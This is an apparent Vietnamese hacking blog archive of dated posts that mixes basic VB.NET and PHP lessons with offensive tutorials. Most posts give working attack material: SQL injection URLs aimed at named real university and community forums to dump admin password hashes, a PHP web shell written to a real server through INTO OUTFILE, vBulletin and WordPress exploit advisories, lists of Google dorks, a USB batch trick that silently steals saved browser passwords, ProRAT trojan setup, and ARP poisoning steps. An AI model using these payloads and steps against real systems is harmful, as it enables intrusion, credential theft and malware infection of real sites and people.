Chủ Nhật, 27 tháng 1, 2013

Phishing addon firefox bằng Backtrack

Kĩ thuật này dùng để giả mạo addon firefox ,sau đó mở cổng mà có thể connect vào máy tính,có tác dụng trên mọi phiên bản win và firefox.Đầu tiên mở terminal của Backtrack lên
type: msfupdate nếu chưa update exploit
type: msfconsole

Visual Basic căn bản

VB.net là ngôn ngữ lập trình hướng đối tượng bậc cao.Theo mình đây là một ngôn ngữ rất mạch lạc ,dễ học và dễ nhớ.Chú ý là kiến thức mình học được đều là tự học,qua mạng,bạn bè.Không từ bất kì thầy cô nào,nên đôi khi một số điều mình hiểu ko đúng 100% .Có gì sai mong ai biết góp ý để mình hoàn thiện kiến thức.

Bài 1:Cấu trúc vb.net và khai báo biến.

Đầu tiên để làm quen với cấu trúc lệnh ta thực thi các ví dụ trên Console application cho dễ nhìn.
Cấu trúc của Vb.net đc miêu ta như sau

Public/Private Function/Sub Tên(Biến tham chiếu hoặc tham trị)
 Dim bien_1 As Kiểu_biến_1                     'khai bao bien
 Dim bien_2 As Kiểu_biến_2
 Command_1
 Command_2
End Sub/Function
ta thấy trong visual basic kết thúc các câu lệnh ko có kí tự ngắt lệnh,để kết thúc câu lệnh ta buộc phải xuống dòng,khác với các ngôn ngữ khác.Và để comment trên visual basic ta dùng dấu nháy đơn đặt trước comment. Ví dụ sau đây yêu cầu nhập 1 số nguyên và in ra bình phương của nó.


Module Module1
    Sub Main()
        Dim a As Integer 'khai báo biến a là kiểu integer
        Console.WriteLine("nhập giá trị a")
        a = Integer.Parse(Console.ReadLine())
        Dim result As Integer = Chuongtrinh(a)
        Console.Write("gia tri binh phuong cua bien a:")
        Console.WriteLine(result)
        Console.ReadKey()
    End Sub
    Public Function Chuongtrinh(ByVal a) As Integer
        Return a * a
    End Function
End Module
Ví dụ như ta nhập vào là 3 thì kết quả in ra là --> gia tri binh phuong cua bien a:9
Ta dùng Console.ReadKey() để tạm dừng chương trình mà xem kết quả.Nếu như ko có câu lệnh này thì chạy xong nó tắt luôn.Ta chưa kịp nhìn thấy gì cả.
Như ví dụ trên thì ta thấy có thể viết ra màn hình bằng 2 lệnh Console.Write() và Console.WriteLine().
2 cái này nó khác nhau ở chỗ 1 cái in ra ở trên cùng một dòng và một cái in ra xong nó xuống dòng.Tương tự điều này cho Console.Read() và Console.ReadLine().

Thứ Sáu, 25 tháng 1, 2013

Căn Bản PHP

Hiện nay nó khá nhiều ngôn ngữ viết web như asp,perl,php.... Mình định viết tất cả cho mọi người.Bài đầu tiên mình viết căn bản về lập trình PHP.Đây là 1 ngôn ngữ khá phổ biến.Rất nhiều mã nguồn đc viết bằng php.Bao nhiêu phần trăm thì mình không rõ.Nhưng đa số là php rồi.

Để chạy đc file php thì mọi người có khá nhiều cách,cài localhost ,hay kiếm 1 cái host nào đấy,vất lên là chạy thôi.

Bài 1.
Chương trình php đầu tiên :
Php có thể dễ dàng chèn vào nội dung của file html,hoặc có thể sinh ra mã html luôn

Mình lấy 1 ví dụ


<html>

<title>vhbgroup family</title>
</html>
<body>
    <?php
        echo "đây là mã php đầu tiên của chúng ta";
    ?>
</body>
</html>

lưu lại demo.php cho lên host ta sẽ nhận đc --->đây là mã php đầu tiên của chúng ta
Có thêm 1 số cách khai báo mã php
ví dụ như dạng script
<script language ="php">
        echo "đây là mã php đầu tiên của chúng ta";
  </script>

hay dạng không định thức
<?
echo "đây là mã php đầu tiên của chúng ta";
?>
Để in ra cái gì đó thì ta dùng lệnh echo,print. (bởi vì ngôn ngữ php nó khá tương đồng với C nên ở đây chơi đc luôn print.Chúng ta sẽ bắt gặp khá nhiều sự tương đồng ở đây,ví dụ như khi ghi chú chẳng hạn
có thể dùng # trong perl hoặc // trong C#         /* */ trong C++


Thứ Tư, 16 tháng 1, 2013

Hack forum với metod dnn

tìm các forum lỗi với dork chính sau
inurl:/portals/0/default.aspx
inurl:/tabid/36/language/en-US/Default.aspx

Mình tùy biến đi để có dork cho site việt nam nhé

inurl:"/portals/0? site:..vn




exploit vbulletin với thông qua backup

Khi tạo backup,đôi khi database đc lưu trong thư mục backup ,thông qua việc này ta dùng dork hợp lí để lấy database đó về,lấy pass và login nhé.
dork ví dụ như
allinurl:forumbackup
allinurl:forumbackup sql
filetype:gz
filetype:sql
filetype:gql.gz
.....
victim ví dụ nè
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGEQFjAH&url=http%3A%2F%2Fwww.forzacentral.com%2Fbackup%2Fforumbackup-03032010-6bb80.sql&ei=ew73UNvDPM364QSkmoCoDw&usg=AFQjCNET3jdjzfPWX6Op_tNHZL8aYk7AAw&sig2=TkzaNPIWY5_ed1ekfY1TOw&bvm=bv.41018144,d.bGE&cad=rja

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F%2Fwww.decoratingforum.com.au%2Fbackups%2Fforumbackup-18-09-2009-ceae8.sql&ei=tQ_3UIe7FMnc4QSRiIDQAg&usg=AFQjCNF7zSIWPRH-CJSRLFJpNbjrecSF_Q&sig2=CltQlV16h5vyh7J8dlAd3A&bvm=bv.41018144,d.bGE&cad=rja

Thứ Hai, 14 tháng 1, 2013

Một số cách bypass sqli


Phần đầu mình lấy của Judon trong vhb

Phần 1


Báo lỗi
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3


Thực hiện lệnh order by tìm cột lỗi
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 9--   // ko lỗi nhé

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 10--  // báo lỗi Unknown column '10' in 'order clause'

=>> có 10 cột từ 0-9

Thứ Bảy, 12 tháng 1, 2013

[TUT] Uploading Shell Without Getting into Admin Panel [leech]

[TUT] Uploading Shell Without Getting into Admin Panel

I see lot of people SQL injecting and trying their hard luck to get in admin panel to upload a shell.
- This Tutorial is not N00b friendly - If you use Tools for SQL injection don't bother reading this -

Vulnerable Link :
Code:
http://www.trends-in-newsrooms.org/articles.php?id=
There is total 14 Columns and i took 1 as visible
Code:
http://www.trends-in-newsrooms.org/artic...,4,5,6,7--

now try to see if you can load_file in the visible column.. We can read files in this server using this command.

Usually you can exec this command if you have access to table mysql.users--

example : - 1 union all select load_file('filetoload'),2,3,4,5,6 from mysql.users--


Ok now lets take the case of this website.. lets try to read its /etc/passwd so we can get the actual path where the website is located.
Code:

http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20load_file%28%27/etc/passwd%27%29,2,3,4,5,6,7--
The website will display the '/etc/passwd' file.

Code:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh stephane:x:1000:1000:stephane,,,:/home/stephane:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false identd:x:104:65534::/var/run/identd:/bin/false postfix:x:105:106::/var/spool/postfix:/bin/false postgres:x:106:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sympa:x:107:110:Sympa mailing list manager,,,:/var/lib/sympa:/bin/false ftpd:x:1001:1001::/home/ftp:/bin/nologin juancarlos:x:1002:1002:Juan Carlos Cedillo,,,:/home/juancarlos:/usr/lib/sftp-server clamav:x:108:111::/var/lib/clamav:/bin/false libuuid:x:109:112::/var/lib/libuuid:/bin/sh wanadmin:x:1003:1003:Stephane Karges,,,:/home/wanadmin:/bin/bash aralynn:x:1004:1004:Aralynn McMane,,,:/home/www/vhosts/wan-press.org/httpdocs/nie/downloads/:/usr/lib/sftp-server
/home/www/vhosts/wan-press.org/httpdocs/

Probably this is the path where the site seems to be located, which i am not very sure although... Lets see if we can write a file in this directory..

I dont want any numbers to be written on the file i am going to write into the server. so i am gonna change 2,3,4,5,6,7 to 'null'

Code:
http://www.trends-in-newsrooms.org/artic...c.php%27--
Fayul~ we get a response.


Code:
Can't create/write to file '/home/www/vhosts/wan-press.org/httpdocs/epic.php' (Errcode: 13)
It means the path is not chmod to 777 that we can write any file there or we don't have permissions to write into another website using mysql. Okay lets try writing it somewhere else.


Code:
http://www.trends-in-newsrooms.org/artic...all+select 'L33t~cyb3r_master~was~here',null,null,null,null,null,null+into+outfile+'/var/tmp/fayul'--
Page loads fine, Now check..

Code:
http://www.trends-in-newsrooms.org/artic...,4,5,6,7--
Site will display "l33t~cyb3r_master~was~here"

Similarly, if you can find path of this website you can write a php backdoor. Replace l33t cyb3r_master was here with..



Shell Code :
Code:
'<? system($_REQUEST['cmd']); ?>'
After you upload to path of site succesfully you can upload your shell by going to site


Code:
http://www.site.com/pathtoyourbackdoor/lol.php?cmd=ls -la

Chèn code shell vào ảnh dùng backtrack

Upload shell là 1 khâu rất là quan trọng trong local đúng hem nè,mà nhiều site nó chặn việc upload php,chỉ cho up ảnh,do đó tạo 1 con shell cái mà xem như 1 ảnh để ta up lên là 1 điều cần làm.Shell ảnh thì nhiều nguời có ùi,giờ mình chỉ làm cách tạo nó thui,sp có bảo là có thể tạo bằng photoshop,nhưng cách này của sp có vẻ dễ hơn,từ nay ta có thể tạo bất kì con shell bằng file ảnh nhé.
Dùng icon2php
download ở đây,
đem về giải nén ra desktop nha (dùng unrar x iCon2PHP.rar)
giải nén ra ta đc thư mục iCon2PHP
cd iCon2PHP
chạy tiếp lệnh python iCon2PHP.py nhé
nó sẽ hiện lên 2 đường dẫn,đường dẫn đầu là đường dẫn file ảnh cần chén code,đường dẫn sau là đường dẫn shell.
sau đây mình add con r57.php vào capuchino.jpg nhé

Thứ Sáu, 11 tháng 1, 2013

WordPress Gallery 3.8.3 Arbitrary File Read [leech]


################################################## #########################
#
# Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Beni_Vanda

#
# Home : http://IrIsT.Ir/forum/
#
# Software Link : http://wordpress.org/extend/plugins/gallery-plugin/
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : inurl:plugins/nextgen-gallery
#
################################################## ##############################​##############
#
# Expl0iTs :
#
# [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
#
#
################################################## #########################
#
# Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan
#
# and All Members In Www.IrIsT.Ir/forum
#
################################################## ########################

Cracking SHA 256 and SHA 512 linux/unix passwords


If you’ve ever tried to crack passwords from a new ubuntu or other new linux’s, you may have noticed that John The Ripper cannot crack the hashes starting with $5$ or $6$.
I had 2 passwords i needed to check. The passwords came from /etc/shadow from a newer Ubuntu version and i didnt even notice that the hash started with $6$ instead of the usual $1$. After searching and reading for a while, i found out that this is simply the newest generation of password hashes for linux. The “normal” hash ($1$) is MD5. The new ones are $5$ and $6$ and are SHA256 and SHA512 respectively.
The implementation of SHA passwords in linux is done by Ulrich Drepper at RedHat and his original paper can be found here.

Các loaị mã hóa



1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
2.MD4 có 3 loại:
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
3.MD5 có tới 5 dạng:

0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự

3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự

DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự

$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự

$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
4.MSCash
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
5.SHA-1 có 2 loại:
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự


Thứ Ba, 8 tháng 1, 2013

Thêm 1 số exploit vbulletin


Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability

#####################################
#
# Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir/forum
#
# Software Link : http://www.Vbulletin.com/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : intext:"Powered By Vbulletin 4.1.12"
#
#####################################
#
#  Expl0iTs :
#
#  http://target.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql]
#
#####################################
#
# Greats : B3HZ4D - nimaarek - Net.W0lf - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r 
#
# 0x0ptim0us - TaK.FaNaR - m3hdi - F () rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - 
#
# d3c0d3r - Samim.S - Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
#
#############################


Tiếp tục exploit vBulletin với Awards System 4.0.2+ SQL Injection

dork thì sáng tạo ra nha
Ở đây mình dùng dork:   inurl:request_award.php Powered by vBulletin® Version 4.0.2
vào site victim với dạng victim.com/request_award.php
Khai thác bằng thêm data với cấu trúc như sau ,có thể dùng addon hackbar nha

do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
-->victim.com/request_award.php
Data:do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit

Mình lấy ví dụ victim là trang ihabteens.com
kết hợp command và query nó 


http://www.ihabteens.com/forums/request_award.php
Post :do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit

Exploit 4.0.x bằng perl cho newbie

Chạy perl xong
Tạo file perl với nội dung:

#!/usr/bin/perl
use IO::Socket;

print q{
#######################################################################
#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit                                      #
#                    By th3.g4m3_0v3r                                                                          #
#              our Site www.h4ck3r.in                                                                         #
#           www.hackingcrackingtricks.blogspot.com                                                  #
#           Indian (th3.g4m3_0v3r@yahoo.com)                                                          #
#          Dork: Powered by vBulletin? Version 4.0.1                                                  #            

Tiếp Tục Phần Khai Thác Vbulletin [sql trên shoutbox]

2 bài trứoc viết về vbb,tiếp tục mình viết nốt mấy bug còn lại ,bài này là lỗi sql trên shoutbox
dork khai thác :inurl:infernoshout.php
ra một số trang thêm vào đuôi victim tìm đc đoạn như sau
victim.com/folder/infernoshout.php?do=options&area=commands
Mình demo trên http://bien19.biz/forum/infernoshout.php?do=options&area=commands
hiện ra như sau

Như thấy nó hiện ra 4 khung,khung đầu nhập vào đoạn query là

Thứ Hai, 7 tháng 1, 2013

vbulletin CSRF attack - Add plugin & Upload shell

Vì ko có quyền smod của trang nào nên ko demo đc,search trên youtube cho ai quan tâm.
http://www.youtube.com/watch?feature=player_embedded&v=0W8KWdiHzCI
Tìm đc cách fix luôn ,từ sinhvienit
Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết. 
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
PHP Code:
$config['Misc']['admincpdir']  

Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần admincp hoạt động sai hoặc ko hoạt động... Nên khi dùng cách này các bạn cần lưu ý.

Check sqlinjection vbulletin mod chang stats

Lỗi cổ rồi viết lại cho ai chưa biết
http://www.mediafire.com/?rsbbczaf00abqtf

Có thể xem thêm victim sau
http://www.bacgiangonline.net/diendan/ajax.php?do=allforum&result=20

Forum teen Tỉnh Bắc Giang :http://www.bacgiangonline.net/diendan/ajax.php?do=inforum&listforumid=-20)+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws(0x2f,userid,password,salt),7,8,9,10 from user where userid =1-- -&result=20









Khoa tài chính - Kế tóan -Đại học sài gòn :http://fafsgu.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Khoa công trình thủy -Đại học hàng hải :http://ctt.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20



Khoa tài chính ngân hàng-đại học thương mại: http://www.tcnh-dhtm.org/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học kỹ thuật công nghiệp :http://k43tdh2.com/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học lao động xã hội: http://wwwulsa.edu.vn/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!50000from*/+/*!50000user*/+/*!50000where*/+/*!50000userid*/=1--%20-&result=20

Đại học thành đô Hà Nội:http://svthanhdo.com/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20

Diễn đàn Kinh Môn http://kinhmon24h.com/4rum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20

Game gủng gì đó mới ra :http://forum.tinhvankiem.net/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,2,3,4,5,concat_ws%280x2f,userid,password,salt%29,7,8,9,10%20from%20user%20where%20userid%20=1--%20-&result=20



Cộng đồng cao học Kinh Tế VN:http://caohockinhte.vn/forum/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10%20%20from%20user%20where%20userid%20=1--%20-&result=20


Chủ Nhật, 6 tháng 1, 2013

Attack Win với ARP Cache Poisoning trên Backtrack

Vào Terminal,chỉnh sửa file /etc/etter.conf
Gõ:nano /etc/etter.conf  rồi tìm đoạn sau

# if you use iptables:
  # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %$
  # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport $

Sửa lại thành như sau :(bỏ dấu # đi)

# if you use iptables:
  redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %$
  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport $

Lưu lại và thoát ra
Tiếp theo ta scan network bằng nnap,ở đây là mạng lan
nmap -sP 192.168.40.1/24

Sniffing dùng Ettercap Trên Backtrack 5

Sniffing là gì nếu ai chưa biết thì dùng google nhá
Bước 1:Mở terminal
Bước 2:Gõ lệnh ettercap -G


Hiện ra như sau

Exploit win 8 với Backtrack 5

Lần trứoc chúng ta đã biết cách attack win xp và win 7 link dùng browser autopwn với backtrack 5 link here ,còn đối với win 8,hệ điều hành mới đc micro giới thiệu trong thời gian gần đây thì sao.Mình tiện viết luôn bài đối với win 8 nhé.
 Đầu tiên mở terminal backtrack lên
 Gõ:msfconsole
 Gõ:use exploit/multi/browser/java_signed_applet

Hơn 3000 dork sql injection



   
    about.php?cartID=
    accinfo.php?cartId=
    acclogin.php?cartID=
    add.php?bookid=
    add_cart.php?num=
    addcart.php?
    addItem.php
    add-to-cart.php?ID=
    addToCart.php?idProduct=
    addtomylist.php?ProdId=
    adminEditProductFields.php?intProdID=
    advSearch_h.php?idCategory=
    affiliate.php?ID=
    affiliate-agreement.cfm?storeid=
    affiliates.php?id=
    ancillary.php?ID=
    archive.php?id=
    article.php?id=
    phpx?PageID
    basket.php?id=

Thứ Sáu, 4 tháng 1, 2013

Lấy pass lưu trong firefox,opera,chrome dùng USB

   Đầu tiên tải các file sau về http://www.mediafire.com/?3aijmohqomvklsw
tiếp tục copy đoạn code sau đây vào nodepad,lưu lại tên file  là file.bat
start PasswordFox.exe /stext firefox.txt
start OperaPassView.exe /stext Opera.txt
start ChromePass.exe /stext Chrome.txt

đặt tất cả các file,cùng với 3 file khi nãy tải về vào usb,ta có thể để vào trong folder nào đó,hoặc cho thêm lẫn nhiều file vào
  Sau đó cắm vào máy victim .
  Rồi tự mình kich vào file.bat hoặc nói với victim là mình muốn check nó hay gì đó,chỉ cần kich vào file.bat thôi nhá
  Sau khi kick vào file.bat màn hình sẽ đen 2giây.Lúc này pass đã đc lưu lại vào usb với tên file là firefox.txt
opera.txt,chrome.txt
  ^_^

Đăng nhập administrator trên winxp (Chưa check trên win 7)

Đôi khi ngồi vào 1 máy nào đó,nhưng nó chỉ có quyền user thường,hoặc bị lock màn hình.Nếu ta muốn vào bằng administrator mà ko biết pass thì làm như sau
-Khởi động lại máy tinhs
-Nhấn F8 xuất hiện như sau
Safe mode
Safe mode with networking
Safe mode with command promt
Start windows normally

-Chọn Safe mode ,và màn hình đen xuất hiện,sau đó nó sẽ hiện ra user thường và administrator để bạn chọn đăng nhập vào ,tất nhiên ta chọn administrator để login vào
tiếp tục mở Cmd
Start->Run->CMD
Gõ lệnh net user ,nó sẽ hiện ra các user
gõ tiếp
net user (tên account administrator) *
có space trước dấu * nhé
nó sẽ hiện ra chỗ nhập mật khẩu mới,
nhập và khởi động lại máy là oke
rất là dễ.


Tìm password từ các con keylog trên thế giới

Vào trang http://pastebin.com/
tìm khung search bar và nhập vào
Program:firefox Url/Host:http://www.facebook.com login 
hoặc
Program:firefox Url/Host:http://www.yahoo.com login 

tùy cái cần tìm mà nhập nhá 

vì dụ với Program:firefox Url/Host:http://www.facebook.com login
 ta nhận đc là 

Sqli với backtrack dùng bộ công cụ Darkmysqli

Victim demo :http://autohoabinh.com/?page=products_detail&id=293&catid=11
Khi ta check http://autohoabinh.com/?page=products_detail&id=293&catid=11"
thì nhận đc là 


--->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/athb/domains/autohoabinh.com/public_html/templates/products_detail.htmon line 62

dòng này cho thấy có lỗi

Thứ Năm, 3 tháng 1, 2013

Hacking Remote Computer Using ProRAT

Hacking Remote Computer Using ProRAT 
Friends today i'm writting a thread on Hacking Remote PC using ProRat.
Hope you'll find it useful. You can also have pictorial tutorial. Let's start.

1) First of all Download ProRat

Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2) Open up the program.

3) Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

4) Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.

5) Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Thứ Tư, 2 tháng 1, 2013

Joomscan On Backtrack 5R1


JoomScan 

..:: Is a Vulnerability Scanning Tool ::..


Introduction 
Joomscan is the CMS Vulnerability Identification Tool .
This tool is created by YGN Ethical Hacker Group from Myanmar(Burma).
Joomscan is used to find the vulnerability in the websites . 
Joomscan helps the developer to find the weaknesses in the websites .
Joomscan is a signature based scanner which can detect the XSS/CSRF, sql injection etc on the target website .
How to open Joomscan on Backtrack 5 

Follow : Backtrack > Vulnerability Assessment > Web Assessment > CMS Vulnerability Identification Tool > joomscan 

Metasploit


1) Giới thiệu
Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại www.metasploit.com
Metasploit có thể tự động update bắt đầu từ version 2.2 trở đi, sử dụng script msfupdate.bat trong thư mục cài đặt
2)Các thành phần của Metasploit
Metasploit hỗ trợ nhiều giao diện với người dùng:
-console interface: dùng msfconsole.bat. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn
-Web interface: dùng msfweb.bat, giao tiếp với người dùng thông qua giao diện web
-Command line interface: dùng msfcli.bat
Enviroment
Global Enviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits
Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác
Bạn có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong /.msf/config và sẽ được load trở lại khi user interface được thực hiện
Những options nào mà chung giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì bạn nên được xác định ở Global Enviroment
vd: msf> setg LPORT 80
msf> setg LHOST 172.16.8.2


3)Sử dụng Metasploit framework
1. Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác
show exploits: xem các module exploit mà framework có hỗ trợ
use exploit_name: chọn module exploit
info exploit_name: xem thông tin về module exploit
Bạn nên cập nhật thường xuyên các lỗi dịch vụ trên www.metasploit.com hoặc qua script msfupdate.bat

2. Cấu hình module exploit đã chọn
show options: Xác định những options nào cần cấu hình
set : cấu hình cho những option của module đó
Một vài module còn có những advanced options, bạn có thể xem bằng cách gõ dòng lệnh show advanceds
3. Verify những options vừa cấu hình:
check: kiểm tra xem những option đã được set chính xác chưa.
4. Lựa chọn target: lựa chọn hệ diều hành nào để thực hiện
show targets: những target được cung cấp bởi module đó
set: xác định target nào
vd: smf> use windows_ssl_pct
show targets
exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1
5. Lựa chọn payload
payload là đoạn code mà sẽ chạy trên hệ thống remote machine
show payloads: liệt kê ra những payload của module exploit hiện tại
info payload_name: xem thông tin chi tiết về payload đó
set PAYLOAD payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó
show advanced: xem những advanced options của payload đó
6.Thực thi exploit
exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác
4.Giới thiệu payload meterpreter
Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus
Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers
Fs: cho phép upload và download files từ các remote machine
Net: cho phép xem thông tin mạng của remote machine như IP, route table
Process:cho phép tạo các processes mới trên remote machine
Sys: cho phép xem thông tin hệ thống của remote machine
Sử dụng câu lệnh
use -m module1,module2,module3 [ -p path ] [ -d ]
Câu lệnh use dùng để load những module mở rộng của meterpreter như: Fs, Net, Process..
loadlib -f library [ -t target ] [ -lde ]
Câu lệnh cho phép load các thư viện của remote machines
read channel_id [length]
Lệnh read cho phép xem dữ liêu của remote machine trên channel đang kết nối
write channel_id
Lệnh write cho phép ghi dữ liệu lên remote machine
close channel_id
Đóng channel mà đã kết nối với remote computer
interact channel_id
